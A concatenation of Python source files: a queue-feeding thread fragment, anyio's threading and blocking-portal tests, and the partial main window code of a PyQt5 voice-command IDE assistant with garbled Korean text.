#print('content of piece: \n{0}'.format(piece))
#'''this is where data is fed into the queue for future fetch'''
sess.run(self.enqueue, feed_dict={self.sample_placeholder: piece})
#skeleton = skeleton[self.sample_size:,:]
#else:
#sess.run(self.enqueue,
#feed_dict={self.sample_placeholder: skeleton})
def start_threads(self, sess, n_threads=1):
for _ in range(n_threads):
thread = threading.Thread(target=self.thread_main, args=(sess,))
thread.daemon = True # Thread will close when parent quits.
thread.start()
self.threads.append(thread)
return self.threads
|
test_threads.py | import asyncio
import sys
import threading
import time
from concurrent.futures import CancelledError
from contextlib import suppress
import pytest
from anyio import (
create_blocking_portal, create_capacity_limiter, create_event, create_task_group,
get_cancelled_exc_class, get_current_task, run, run_async_from_thread, run_sync_from_thread,
run_sync_in_worker_thread, sleep, start_blocking_portal, wait_all_tasks_blocked)
if sys.version_info < (3, 7):
current_task = asyncio.Task.current_task
else:
current_task = asyncio.current_task
pytestmark = pytest.mark.anyio
async def test_run_async_from_thread():
async def add(a, b):
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a, b):
assert threading.get_ident() != event_loop_thread_id
return run_async_from_thread(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await run_sync_in_worker_thread(worker, 1, 2)
assert result == 3
async def test_run_sync_from_thread():
def add(a, b):
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a, b):
assert threading.get_ident() != event_loop_thread_id
return run_sync_from_thread(add, a, b)
event_loop_thread_id = threading.get_ident()
result = await run_sync_in_worker_thread(worker, 1, 2)
assert result == 3
def test_run_sync_from_thread_pooling():
async def main():
thread_ids = set()
for _ in range(5):
thread_ids.add(await run_sync_in_worker_thread(threading.get_ident))
# Expects that all the work has been done in the same worker thread
assert len(thread_ids) == 1
assert thread_ids.pop() != threading.get_ident()
assert threading.active_count() == initial_count + 1
# The thread should not exist after the event loop has been closed
initial_count = threading.active_count()
run(main, backend='asyncio')
assert threading.active_count() == initial_count
async def test_run_async_from_thread_exception():
async def add(a, b):
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a, b):
assert threading.get_ident() != event_loop_thread_id
return run_async_from_thread(add, a, b)
event_loop_thread_id = threading.get_ident()
with pytest.raises(TypeError) as exc:
await run_sync_in_worker_thread(worker, 1, 'foo')
exc.match("unsupported operand type")
async def test_run_sync_from_thread_exception():
def add(a, b):
assert threading.get_ident() == event_loop_thread_id
return a + b
def worker(a, b):
assert threading.get_ident() != event_loop_thread_id
return run_sync_from_thread(add, a, b)
event_loop_thread_id = threading.get_ident()
with pytest.raises(TypeError) as exc:
await run_sync_in_worker_thread(worker, 1, 'foo')
exc.match("unsupported operand type")
async def test_run_anyio_async_func_from_thread():
def worker(*args):
run_async_from_thread(sleep, *args)
return True
assert await run_sync_in_worker_thread(worker, 0)
async def test_run_in_thread_cancelled():
def thread_worker():
nonlocal state
state = 2
async def worker():
nonlocal state
state = 1
await run_sync_in_worker_thread(thread_worker)
state = 3
state = 0
async with create_task_group() as tg:
tg.spawn(worker)
tg.cancel_scope.cancel()
assert state == 1
async def test_run_in_thread_exception():
def thread_worker():
raise ValueError('foo')
with pytest.raises(ValueError) as exc:
await run_sync_in_worker_thread(thread_worker)
exc.match('^foo$')
async def test_run_in_custom_limiter():
def thread_worker():
nonlocal num_active_threads, max_active_threads
num_active_threads += 1
max_active_threads = max(num_active_threads, max_active_threads)
event.wait(1)
num_active_threads -= 1
async def task_worker():
await run_sync_in_worker_thread(thread_worker, limiter=limiter)
event = threading.Event()
num_active_threads = max_active_threads = 0
limiter = create_capacity_limiter(3)
async with create_task_group() as tg:
for _ in range(4):
tg.spawn(task_worker)
await sleep(0.1)
assert num_active_threads == 3
assert limiter.borrowed_tokens == 3
event.set()
assert num_active_threads == 0
assert max_active_threads == 3
def test_run_async_from_unclaimed_thread():
async def foo():
pass
exc = pytest.raises(RuntimeError, run_async_from_thread, foo)
exc.match('This function can only be run from an AnyIO worker thread')
def test_run_sync_from_unclaimed_thread():
def foo():
pass
exc = pytest.raises(RuntimeError, run_sync_from_thread, foo)
exc.match('This function can only be run from an AnyIO worker thread')
@pytest.mark.parametrize('cancellable, expected_last_active', [
(False, 'task'),
(True, 'thread')
], ids=['uncancellable', 'cancellable'])
async def test_cancel_worker_thread(cancellable, expected_last_active):
"""
Test that when a task running a worker thread is cancelled, the cancellation is not acted on
until the thread finishes.
"""
def thread_worker():
nonlocal last_active
run_sync_from_thread(sleep_event.set)
time.sleep(0.2)
last_active = 'thread'
run_sync_from_thread(finish_event.set)
async def task_worker():
nonlocal last_active
try:
await run_sync_in_worker_thread(thread_worker, cancellable=cancellable)
finally:
last_active = 'task'
sleep_event = create_event()
finish_event = create_event()
last_active = None
async with create_task_group() as tg:
tg.spawn(task_worker)
await sleep_event.wait()
tg.cancel_scope.cancel()
await finish_event.wait()
assert last_active == expected_last_active
@pytest.mark.parametrize('anyio_backend', ['asyncio'])
async def test_cancel_asyncio_native_task():
async def run_in_thread():
nonlocal task
task = current_task()
await run_sync_in_worker_thread(time.sleep, 1, cancellable=True)
task = None
async with create_task_group() as tg:
tg.spawn(run_in_thread)
await wait_all_tasks_blocked()
task.cancel()
class TestBlockingPortal:
class AsyncCM:
def __init__(self, ignore_error):
self.ignore_error = ignore_error
async def __aenter__(self):
return 'test'
async def __aexit__(self, exc_type, exc_val, exc_tb):
return self.ignore_error
async def test_successful_call(self):
async def async_get_thread_id():
return threading.get_ident()
def external_thread():
thread_ids.append(portal.call(threading.get_ident))
thread_ids.append(portal.call(async_get_thread_id))
thread_ids = []
async with create_blocking_portal() as portal:
thread = threading.Thread(target=external_thread)
thread.start()
await run_sync_in_worker_thread(thread.join)
for thread_id in thread_ids:
assert thread_id == threading.get_ident()
async def test_aexit_with_exception(self):
"""Test that when the portal exits with an exception, all tasks are cancelled."""
def external_thread():
try:
portal.call(sleep, 3)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results = []
with suppress(Exception):
async with create_blocking_portal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
raise Exception
await run_sync_in_worker_thread(thread1.join)
await run_sync_in_worker_thread(thread2.join)
assert len(results) == 2
assert isinstance(results[0], CancelledError)
assert isinstance(results[1], CancelledError)
async def test_aexit_without_exception(self):
"""Test that when the portal exits, it waits for all tasks to finish."""
def external_thread():
try:
portal.call(sleep, 0.2)
except BaseException as exc:
results.append(exc)
else:
results.append(None)
results = []
async with create_blocking_portal() as portal:
thread1 = threading.Thread(target=external_thread)
thread1.start()
thread2 = threading.Thread(target=external_thread)
thread2.start()
await sleep(0.1)
assert not results
await run_sync_in_worker_thread(thread1.join)
await run_sync_in_worker_thread(thread2.join)
assert results == [None, None]
async def test_call_portal_from_event_loop_thread(self):
async with create_blocking_portal() as portal:
exc = pytest.raises(RuntimeError, portal.call, threading.get_ident)
exc.match('This method cannot be called from the event loop thread')
def test_start_with_new_event_loop(self, anyio_backend_name, anyio_backend_options):
async def async_get_thread_id():
return threading.get_ident()
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
thread_id = portal.call(async_get_thread_id)
assert isinstance(thread_id, int)
assert thread_id != threading.get_ident()
def test_start_with_nonexistent_backend(self):
with pytest.raises(LookupError) as exc:
with start_blocking_portal('foo'):
pass
exc.match('No such backend: foo')
def test_call_stopped_portal(self, anyio_backend_name, anyio_backend_options):
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
pass
pytest.raises(RuntimeError, portal.call, threading.get_ident).\
match('This portal is not running')
def test_spawn_task(self, anyio_backend_name, anyio_backend_options):
async def event_waiter():
await event1.wait()
event2.set()
return 'test'
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
event1 = portal.call(create_event)
event2 = portal.call(create_event)
future = portal.spawn_task(event_waiter)
portal.call(event1.set)
portal.call(event2.wait)
assert future.result() == 'test'
def test_spawn_task_cancel_later(self, anyio_backend_name, anyio_backend_options):
async def noop():
await sleep(2)
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future = portal.spawn_task(noop)
portal.call(wait_all_tasks_blocked)
future.cancel()
assert future.cancelled()
def test_spawn_task_cancel_immediately(self, anyio_backend_name, anyio_backend_options):
async def event_waiter():
nonlocal cancelled
try:
await sleep(3)
except get_cancelled_exc_class():
cancelled = True
cancelled = False
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future = portal.spawn_task(event_waiter)
future.cancel()
assert cancelled
def test_spawn_task_with_name(self, anyio_backend_name, anyio_backend_options):
async def taskfunc():
nonlocal task_name
task_name = get_current_task().name
task_name = None
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
portal.spawn_task(taskfunc, name='testname')
assert task_name == 'testname'
def test_async_context_manager_success(self, anyio_backend_name, anyio_backend_options):
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
assert cm == 'test'
def test_async_context_manager_error(self, anyio_backend_name, anyio_backend_options):
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(Exception) as exc:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(False)) as cm:
assert cm == 'test'
raise Exception('should NOT be ignored')
exc.match('should NOT be ignored')
def test_async_context_manager_error_ignore(self, anyio_backend_name, anyio_backend_options):
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with portal.wrap_async_context_manager(TestBlockingPortal.AsyncCM(True)) as cm:
assert cm == 'test'
raise Exception('should be ignored')
def test_start_no_value(self, anyio_backend_name, anyio_backend_options):
def taskfunc(*, task_status):
task_status.started()
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc)
assert value is None
assert future.result() is None
def test_start_with_value(self, anyio_backend_name, anyio_backend_options):
def taskfunc(*, task_status):
task_status.started('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc)
assert value == 'foo'
assert future.result() is None
def test_start_crash_before_started_call(self, anyio_backend_name, anyio_backend_options):
def taskfunc(*, task_status):
raise Exception('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(Exception, match='foo'):
portal.start_task(taskfunc)
def test_start_crash_after_started_call(self, anyio_backend_name, anyio_backend_options):
def taskfunc(*, task_status):
task_status.started(2)
raise Exception('foo')
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, value = portal.start_task(taskfunc)
assert value == 2
with pytest.raises(Exception, match='foo'):
future.result()
def test_start_no_started_call(self, anyio_backend_name, anyio_backend_options):
def taskfunc(*, task_status):
pass
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
with pytest.raises(RuntimeError, match='Task exited'):
portal.start_task(taskfunc)
def test_start_with_name(self, anyio_backend_name, anyio_backend_options):
def taskfunc(*, task_status):
task_status.started(get_current_task().name)
with start_blocking_portal(anyio_backend_name, anyio_backend_options) as portal:
future, start_value = portal.start_task(taskfunc, name='testname')
assert start_value == 'testname'
|
main.py | # This is a sample Python script.
# Press Shift+F10 to execute it or replace it with your code.
# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.
import sys, os, threading, queue, pyautogui, time
from multiprocessing.managers import BaseManager
import ctypes
import keyboard
sys.path.append(os.path.abspath('..'))
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5 import QtGui, QtCore, QtWidgets
from PyQt5 import uic
import procs.wind as wind
from procs.stt import RecognitionManager
import procs.makeTree as makeTree
import procs.kComm as kComm
import html
from macro import *
form_class = uic.loadUiType("prototype.ui")[0]
child_class = uic.loadUiType("child.ui")[0]
MODES=['๋ช
๋ น', 'ํ์', '๋ณด๊ธฐ']
USRLIB=ctypes.windll.LoadLibrary('user32.dll')
class HelpWindow(QDialog):
def __init__(self, parent):
super(HelpWindow, self).__init__(parent)
uic.loadUi("Help.ui", self)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint | QtCore.Qt.Dialog)
self.termButton.clicked.connect(self.close)
self.roundener=Roundener(self)
self.show()
def paintEvent(self, event):
# get current window size
self.roundener.paintEvent(event)
def mousePressEvent(self, event):
self.roundener.mousePressEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
self.roundener.mouseMoveEvent(event)
super().mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
self.roundener.mouseReleaseEvent(event)
super().mouseReleaseEvent(event)
class PeekerWindow(QDialog):
def __init__(self, sel, parent):
super().__init__()
if len(sel) != 1:
fname=sel[1]
fname=makeTree.rel2abs[fname]
sp=sel[2]
rp=sel[3]
else:
fname=sel[0]
fname=makeTree.rel2abs[fname]
sp=(1,1)
rp=(-1,-1)
self.setupUI(fname)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.hIdeWnd=parent.hIdeWnd
self.pIdeWnd=parent.pIdeWnd
self.base=parent
self.funct1=keyboard.add_hotkey('home+end', callback=self.setToggle)
# self.tid=threading.get_native_id()
self.DISP_NO=20 # ํ ๋ฒ์ ๋ณด์ฌ์ค ์ค์
if (parent.y()+160+350) > QDesktopWidget().availableGeometry().height():
self.move(parent.x()-175, parent.y()-400)
else:
self.move(parent.x()-175, parent.y()+160)
try:
f=open(fname, encoding='UTF-8')
lines=f.readlines()
except UnicodeDecodeError:
f.close()
f=open(fname, encoding='cp949')
lines=f.readlines()
f.close()
self.content=lines[sp[0]-1:rp[0]]
self.content[0]=self.content[0][sp[1]-1:]
self.content[-1]=self.content[-1][:rp[1]]
self.scr=0 # ์คํฌ๋กค, ๊ฐ์ฅ ์ ํ ๋๋ฒ
self.lim=len(self.content)-self.DISP_NO
self.printContent()
self.roundener=Roundener(self)
def setupUI(self, fname):
layout = QtWidgets.QVBoxLayout(self)
self.label=QtWidgets.QLabel('content', self)
self.label.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
layout.addWidget(QtWidgets.QLabel(fname,self))
layout.addWidget(self.label)
layout.addWidget(QtWidgets.QLabel('Home+End๋ก IDE์ ์ฃผ๋ชฉ์ ์ด๋ํ ์ ์์ต๋๋ค.', self))
self.setMinimumWidth(600)
self.setMinimumHeight(350)
def setToggle(self, dummy=None):
if USRLIB.GetForegroundWindow() != self.hIdeWnd:
USRLIB.SetForegroundWindow(self.hIdeWnd)
else:
cp=self.pos()
x, y=pyautogui.position()
pyautogui.click(cp.x()+30, cp.y()+30)
pyautogui.moveTo(x, y)
#print(USRLIB.SetForegroundWindow(int(self.winId())))
def closeEvent(self, event):
keyboard.unregister_hotkey(self.funct1)
self.base.sub2=None
event.accept()
def paintEvent(self, event):
self.roundener.paintEvent(event)
def mousePressEvent(self, event):
self.roundener.mousePressEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
self.roundener.mouseMoveEvent(event)
super().mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
self.roundener.mouseReleaseEvent(event)
super().mouseReleaseEvent(event)
def keyPressEvent(self, event):
super().keyPressEvent(event)
if event.key()==QtCore.Qt.Key_Down:
self.oneDown()
elif event.key()==QtCore.Qt.Key_Up:
self.oneUp()
elif event.key()==QtCore.Qt.Key_Escape:
self.close()
def oneUp(self):
if self.scr > 0:
self.scr -= 1
self.printContent()
def oneDown(self):
if self.scr < self.lim:
self.scr += 1
self.printContent()
def printContent(self):
self.label.setText(''.join(self.content[self.scr:self.scr+self.DISP_NO]))
#html ์ฌ์ฉ์ ์ํ ํด๋์ค
class HTMLDelegate(QtWidgets.QStyledItemDelegate):
def __init__(self, parent=None):
super(HTMLDelegate, self).__init__(parent)
self.doc = QtGui.QTextDocument(self)
def paint(self, painter, option, index):
painter.save()
options = QtWidgets.QStyleOptionViewItem(option)
self.initStyleOption(options, index)
self.doc.setHtml(options.text)
options.text = ""
style = QtWidgets.QApplication.style() if options.widget is None \
else options.widget.style()
style.drawControl(QtWidgets.QStyle.CE_ItemViewItem, options, painter)
ctx = QtGui.QAbstractTextDocumentLayout.PaintContext()
if option.state & QtWidgets.QStyle.State_Selected:
ctx.palette.setColor(QtGui.QPalette.Text, option.palette.color(
QtGui.QPalette.Active, QtGui.QPalette.HighlightedText))
else:
ctx.palette.setColor(QtGui.QPalette.Text, option.palette.color(
QtGui.QPalette.Active, QtGui.QPalette.Text))
textRect = style.subElementRect(QtWidgets.QStyle.SE_ItemViewItemText, options, None)
if index.column() != 0:
textRect.adjust(5, 0, 0, 0)
constant = 4
margin = (option.rect.height() - options.fontMetrics.height()) // 2
margin = margin - constant
textRect.setTop(textRect.top() + margin)
painter.translate(textRect.topLeft())
painter.setClipRect(textRect.translated(-textRect.topLeft()))
self.doc.documentLayout().draw(painter, ctx)
painter.restore()
def sizeHint(self, option, index):
return QtCore.QSize(self.doc.idealWidth(), self.doc.size().height())
class fn_dialog(QDialog): #์๋ก์ด ์ฐฝ for new_window
def __init__(self, content):
super().__init__()
self.setupUI()
delegate = HTMLDelegate(self.fn_lst)
self.fn_lst.setItemDelegate(delegate)
self.fn_lst.setRowCount(len(content[0]) + len(content[1]) + len(content[2]))
self.fn_start = 0
self.class_start = self.fn_start + len(content[0])
self.file_start = self.class_start + len(content[1])
self.fn_lst.setHorizontalHeaderLabels(['์ ํ', '์ด๋ฆ', 'ํ์ผ', '์ค์ฝํ', '๋งค๊ฐ๋ณ์'])
idx_for_listWidget = 0
for id_type, type_line in enumerate(content):
if(type_line):
if(id_type == 0): # ํจ์์ ๊ฒฝ์ฐ [์ด๋ฆ, ํ์ผ, ์์, ๋, ์ค์ฝํ, ๋งค๊ฐ๋ณ์]
for each_fun in type_line:
self.fn_lst.setItem(idx_for_listWidget, 0, QTableWidgetItem('ํจ์'))
idx_for_paramer = {1:0, 2:1, 3:4, 4:5}
for col_ in range(1,5):
self.fn_lst.setItem(idx_for_listWidget, col_,QTableWidgetItem('<span style="color:red">{}</span>'.format(each_fun[idx_for_paramer[col_]])) )
idx_for_listWidget += 1
elif(id_type == 1): # ํด๋์ค์ ๊ฒฝ์ฐ [์ด๋ฆ , ํ์ผ, ์์, ๋]
for each_class in type_line:
self.fn_lst.setItem(idx_for_listWidget, 0, QTableWidgetItem('ํด๋์ค'))
for col_ in range(1,3):
self.fn_lst.setItem(idx_for_listWidget, col_,QTableWidgetItem('<span style="color:blue">{}</span>'.format(each_class[col_-1])) )
idx_for_listWidget += 1
else: # ํ์ผ์ ๊ฒฝ์ฐ [์ด๋ฆ]
for each_file in type_line:
self.fn_lst.setItem(idx_for_listWidget, 0, QTableWidgetItem('ํ์ผ'))
self.fn_lst.setItem(idx_for_listWidget, 1,QTableWidgetItem('<span style="color:green">{}</span>'.format(each_file[0])) )
idx_for_listWidget += 1
else:
pass
self.select_fn = []
self.roundener=Roundener(self)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
#USRLIB.SetForegroundWindow(int(self.winId()))
self.activateWindow()
def setupUI(self):
self.setGeometry(1100, 200, 300, 100)
self.setMinimumWidth(800)
self.setMinimumHeight(400)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
label1 = QLabel("๋ค์์ ๊ฒฐ๊ณผ๋ฅผ ์ฐพ์์ต๋๋ค.")
self.fn_lst = QTableWidget()
self.fn_lst.setSelectionBehavior(QAbstractItemView.SelectRows)
self.fn_lst.setSelectionMode(QAbstractItemView.SingleSelection)
self.fn_lst.setHorizontalHeaderLabels(['์ ํ', '์ด๋ฆ', 'ํ์ผ', '์ค์ฝํ', '๋งค๊ฐ๋ณ์'])
self.fn_lst.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)
self.fn_lst.setColumnCount(5)
self.pushButton1 = QPushButton("Select")
self.pushButton1.clicked.connect(self.pushButtonClicked)
layout = QGridLayout()
layout.addWidget(label1, 0, 0)
layout.addWidget(self.fn_lst, 0, 1)
layout.addWidget(self.pushButton1, 0, 2)
self.setLayout(layout)
def pushButtonClicked(self):
row = self.fn_lst.currentRow()
if(0<= row <self.class_start):
self.select_fn = [0, row]
elif(self.class_start <= row < self.file_start):
self.select_fn = [1, row - self.class_start]
else:
self.select_fn = [2, row - self.file_start]
self.close()
def paintEvent(self, event):
self.roundener.paintEvent(event)
def mousePressEvent(self, event):
self.roundener.mousePressEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
self.roundener.mouseMoveEvent(event)
super().mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
self.roundener.mouseReleaseEvent(event)
super().mouseReleaseEvent(event)
class v_dialog(QDialog): # ์์ฑ ์ ํ์ง
def __init__(self, content):
super().__init__()
self.vlist=content
self.setupUI()
self.fn_lst.insertItems(len(content),content)
self.select_fn = None
self.roundener=Roundener(self)
self.setFocusPolicy(QtCore.Qt.StrongFocus)
self.funct1=keyboard.on_press_key(key='up', callback=self.upDown)
self.funct2=keyboard.on_press_key(key='down', callback=self.upDown)
#self.funct3=keyboard.on_press_key(key='Escape', callback=self.escape)
#USRLIB.SetForegroundWindow(int(self.winId()))
self.activateWindow()
def setupUI(self):
self.setGeometry(1100, 200, 300, 120)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
qr=self.frameGeometry()
cp=QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.setMinimumWidth(400)
self.move(qr.topLeft())
label1 = QLabel("์ด๊ฑธ ์ฐพ์ผ์๋์?")
self.fn_lst = QListWidget()
self.pushButton1 = QPushButton("์ ํ")
self.pushButton1.clicked.connect(self.pushButtonClicked)
layout = QGridLayout()
layout.addWidget(label1, 0, 0)
layout.addWidget(self.fn_lst, 0, 1)
layout.addWidget(self.pushButton1, 0, 2)
self.setLayout(layout)
def upDown(self, dummy):
try:
keyboard.unhook_key(self.funct1)
except KeyError:
pass
try:
keyboard.unhook_key(self.funct2)
except KeyError:
pass
self.funct1=None
self.funct2=None
cp=self.pos()
x, y=pyautogui.position()
pyautogui.click(cp.x()+200, cp.y()+20)
pyautogui.moveTo(x, y)
def pushButtonClicked(self):
self.select_fn = self.fn_lst.currentItem()
self.close()
def paintEvent(self, event):
self.roundener.paintEvent(event)
def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:
super().keyPressEvent(a0)
if a0.key()==Qt.Key_Escape:
self.close()
def mousePressEvent(self, event):
self.roundener.mousePressEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
self.roundener.mouseMoveEvent(event)
super().mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
self.roundener.mouseReleaseEvent(event)
super().mouseReleaseEvent(event)
def escape(self, dummy):
self.close()
def closeEvent(self, a0: QtGui.QCloseEvent) -> None:
#keyboard.unhook_key(self.funct3)
try:
keyboard.unhook_key(self.funct2)
except KeyError:
pass
try:
keyboard.unhook_key(self.funct1)
except KeyError:
pass
return super().closeEvent(a0)
class Roundener: # ์์ ์ ์ฉ ํด๋์ค
def __init__(self, window, brush=None, borderRadius=15):
self.window=window
self.window.setFont(QtGui.QFont('ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular', 10))
self.window.setAttribute(QtCore.Qt.WA_TranslucentBackground)
if brush==None:
self.backBrush=QtGui.QLinearGradient(0,0,0,400)
self.backBrush.setColorAt(0.0, QtGui.QColor(255, 255, 160))
self.backBrush.setColorAt(1.0, QtGui.QColor(240, 200, 120))
self.foregroundColor = QtGui.QColor(240,240,240)
# drag
self.draggable = True
self.dragging_threshould = 5
self.__mousePressPos = None
self.__mouseMovePos = None
self.borderRadius=borderRadius
else:
self.backBrush=brush
def paintEvent(self, event):
s=self.window.size()
qp=QtGui.QPainter()
qp.begin(self.window)
qp.setRenderHint(QtGui.QPainter.Antialiasing, True)
qp.setBrush(self.backBrush)
qp.drawRoundedRect(0, 0, s.width(), s.height(), self.borderRadius, self.borderRadius)
qp.end()
def mousePressEvent(self, event):
if self.draggable and event.button() == QtCore.Qt.LeftButton:
self.__mousePressPos = event.globalPos() # global
self.__mouseMovePos = event.globalPos() - self.window.pos() # local
def mouseMoveEvent(self, event):
if self.__mousePressPos is None:
return
if self.draggable and event.buttons() & QtCore.Qt.LeftButton:
globalPos = event.globalPos()
moved = globalPos - self.__mousePressPos
if moved.manhattanLength() > self.dragging_threshould:
# move when user drag window more than dragging_threshould
diff = globalPos - self.__mouseMovePos
self.window.move(diff)
self.__mouseMovePos = globalPos - self.window.pos()
return diff
def mouseReleaseEvent(self, event):
if self.__mousePressPos is not None:
if event.button() == QtCore.Qt.LeftButton:
moved = event.globalPos() - self.__mousePressPos
if moved.manhattanLength() > self.dragging_threshould:
# do not call click event or so on
event.ignore()
self.__mousePressPos = None
class SoundSig(QObject):
sin=QtCore.pyqtSignal()
class MyApp(QMainWindow, form_class):
def __init__(self):
super().__init__()
self.base_h = 140
self.extended_h = 300
QtGui.QFontDatabase.addApplicationFont('./resources/TmoneyRoundWindRegular.ttf')
self.sub1=None
self.sub2=None
self.blue=False
self.sin = SoundSig()
self.sin.sin.connect(self.soundIn)
self.hIdeWnd=0 # IDE Window Handle
self.pIdeWnd=0 # IDE Window Pid
self.ctx=threading.Thread(target=makeTree.scanTH, daemon=True)
# active window
threading.Thread(target=wind.currentWindow, args=[self],daemon=True).start()
self.roundener=Roundener(self)
self.setupUi(self)
self.voice.clicked.connect(self.record)
self.termButton.clicked.connect(self.close)
self.open_File.clicked.connect(self.fileopen)
self.help_button.clicked.connect(self.help)
self.macroButton.clicked.connect(self.macro)
self.help_btn.clicked.connect(self.resizeWindow)
self.help_flag = True
self.dialog = QDialog()
self.vMode=0 # 0: basic(๋ช
๋ น ๋ชจ๋, ํ๊ตญ์ด ์ธ์), 1: seek(ํ์ ๋ชจ๋, ์์ด ์ธ์), 2: peek(๋ณด๊ธฐ ๋ชจ๋, ์์ด ์ธ์)
self.voice.setText('์์') # ๊บผ์ง ์ํ
self.kCommands={
'๋ช
๋ น': lambda _: self.setVmode(0),
'ํ์': lambda _: self.setVmode(1),
'๋ณด๊ธฐ': lambda _: self.setVmode(2),
}
# window shape/titlebar/stayontop flag
self.setWindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.open_File.setStyleSheet('''
background-image: url(./resources/folder.png); background-position: center;
background-repeat: no-repeat;
background-position: center;
''')
# button qss
self.textButtons=(
self.termButton,
self.help_button,
self.macroButton,
self.help_btn
)
for bu in self.textButtons:
bu.setStyleSheet('QPushButton:hover{ color: Red; } QPushButton{background-color: rgba(0,0,0,0); border-radius: 5px;}')
self.recording=False
self.voice.setStyleSheet('''
background-image: url(./resources/recoff.png);
background-position: center;
background-repeat: no-repeat;
color: White;
border:0px;
''')
self.funct1=keyboard.on_press_key(key='shift', callback=self.korOn)
self.funct2=keyboard.on_release_key(key='shift', callback=self.korOff)
self.language_change = False #shift ๋๋ ค ์์ผ๋ฉด ON
# stt recognition manager
self.q=queue.Queue()
self.rec_manager = RecognitionManager(self.q, self.sin)
kComm.loadSet()
def setVmode(self, m):
self.vMode=m
if self.blue:
return
self.voice.setText(MODES[m])
if m==0:
if not self.language_change:
#self.rec_manager.change_to('kor')
self.language_change=True
elif self.language_change:
self.language_change=False
#self.rec_manager.change_to('eng')
def korOn(self, dummy):
if self.blue:
return
self.blue=True
if not self.recording:
return
if not self.language_change:
self.language_change=True
#self.rec_manager.change_to('kor')
self.voice.setText('๋ช
๋ น')
self.voice.setStyleSheet(
'''
background-image: url(./resources/recon_kor.png);
background-repeat: no-repeat;
background-position: center;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
'''
)
def korOff(self, dummy):
if not self.recording:
return
if self.vMode != 0:
self.language_change=False
self.voice.setText(MODES[self.vMode])
#self.rec_manager.change_to('eng')
self.voice.setStyleSheet(
'''
background-image: url(./resources/recon.png);
background-repeat: no-repeat;
background-position: center;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
'''
)
self.blue=False
def record(self): # ์์ฑ์ธ์ ํจ์
self.recording = not(self.recording)
if self.recording:
self.voice.setStyleSheet('''
background-image: url(./resources/recon.png);
background-repeat: no-repeat;
background-position: center;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
''')
self.voice.setText(MODES[self.vMode])
self.rec_manager.start()
if self.vMode==0:
self.language_change=True
#self.rec_manager.change_to('kor')
else:
self.voice.setStyleSheet('''
background-image: url(./resources/recoff.png);
background-position: center;
background-repeat: no-repeat;
font-family: ํฐ๋จธ๋ ๋ฅ๊ทผ๋ฐ๋ Regular;
color: White;
border:0px;
''')
self.language_change=False
self.blue=False
self.voice.setText('์์')
self.rec_manager.stop()
def paintEvent(self, event):
self.roundener.paintEvent(event)
def mousePressEvent(self, event):
self.roundener.mousePressEvent(event)
super().mousePressEvent(event)
def mouseMoveEvent(self, event):
diff=self.roundener.mouseMoveEvent(event)
if diff and not self.help_flag:
monitor_y = QDesktopWidget().availableGeometry().height()
if (self.y() + 225 + 350) > monitor_y:
self.help_dialog.move(self.x(), self.y() - 400)
else:
self.help_dialog.move(self.x(), self.y() + 160)
super().mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
self.roundener.mouseReleaseEvent(event)
super().mouseReleaseEvent(event)
def closeEvent(self, event):
# close all children
# ์ฌ๊ธฐ์์ ํด๊ฒฐ์ด ํ์ํจ
if self.sub1 is not None:
